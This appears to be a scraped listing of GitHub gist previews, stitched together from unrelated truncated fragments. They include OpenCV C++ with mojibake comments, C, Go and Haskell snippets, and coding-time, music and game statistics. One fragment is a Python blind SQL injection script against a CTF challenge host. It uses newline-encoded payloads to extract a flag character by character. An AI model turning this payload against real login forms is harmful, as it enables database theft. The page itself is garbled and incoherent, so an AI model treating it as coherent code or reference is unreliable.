This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//ๅป้คไบๅผๅพๅ่พน็ผ็็ชๅบ้จ | |
//uthresholdใvthresholdๅๅซ่กจ็คบ็ชๅบ้จ็ๅฎฝๅบฆ้ๅผๅ้ซๅบฆ้ๅผ | |
//typeไปฃ่กจ็ชๅบ้จ็้ข่ฒ๏ผ0่กจ็คบ้ป่ฒ๏ผ1ไปฃ่กจ็ฝ่ฒ | |
void delete_jut(Mat& src, Mat& dst, int uthreshold, int vthreshold, int type) | |
{ | |
int threshold; | |
src.copyTo(dst); | |
int height = dst.rows; | |
int width = dst.cols; | |
int k; //็จไบๅพช็ฏ่ฎกๆฐไผ ้ๅฐๅค้จ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Created by 31838 on 7/2/2019. | |
// | |
#include "set.h" | |
#include <string.h> | |
#include <errno.h> | |
struct internal_set { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
s=requests.session() | |
flag='' | |
for i in range(1,50): | |
p='' | |
for j in range(1,255): | |
payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'" | |
#print payload | |
url="http://55a37af9-cb39-4361-a2cb-9b30b468527c.node3.buuoj.cn/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C# 9 hrs 7 mins โโโโโโโโโโโโโโโโโโโโโ 44.6% | |
unity 7 hrs 16 mins โโโโโโโโโโโโโโโโโโโโโ 35.5% | |
sh 3 hrs 36 mins โโโโโโโโโโโโโโโโโโโโโ 17.6% | |
Other 24 mins โโโโโโโโโโโโโโโโโโโโโ 2.0% | |
JSON 3 mins โโโโโโโโโโโโโโโโโโโโโ 0.3% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Yu-Peng Chen โโโโโโโโโโโโโโโโโ 70 plays | |
REOL โโโโโโโโโโโโโโโโโ 59 plays | |
Manu Pilas โโโโโโโโโโโโโโโโโ 53 plays | |
Xeuphoria โโโโโโโโโโโโโโโโโ 46 plays | |
Ramin Djawadi โโโโโโโโโโโโโโโโโ 19 plays | |
Emmanuel David Lipszyc โโโโโโโโโโโโโโโโโ 14 plays | |
Audiomachine โโโโโโโโโโโโโโโโโ 13 plays | |
La Fanfarria del Capitรกn โโโโโโโโโโโโโโโโโ 10 plays | |
Andrew Britton โโโโโโโโโโโโโโโโโ 9 plays | |
Cecilia Krull โโโโโโโโโโโโโโโโโ 8 plays |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
๐ Grand Theft Auto V ๐ 1253 hrs 21 mins | |
๐ซ Counter-Strike: Global Offensive ๐ 1174 hrs 31 mins | |
๐ฎ War Thunder ๐ 108 hrs 6 mins | |
๐ฎ Human: Fall Flat ๐ 71 hrs 53 mins | |
๐ฎ HITMANโข ๐ 20 hrs 18 mins |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package hlbvh | |
import ( | |
"math/bits" | |
"sync/atomic" | |
) | |
// Mark: - Kernels | |
func calculateMortonCodeKernel(dispatcher workDispatcher, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
data PState (s :: S) | |
= PInitial | |
| PFound | |
| PFailed | |
deriving stock | |
( Generic | |
, Enum | |
, Bounded | |
) | |
deriving anyclass |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Primary logic: | |
# | |
# forever $ | |
# let noUpd = do | |
# checkUpdate | |
# traverse activate instances | |
# sleep updateInterval | |
# retryOnError f = catch (void f) $ const $ retryOnError f | |
# upd = do | |
# traverse deactivate instances |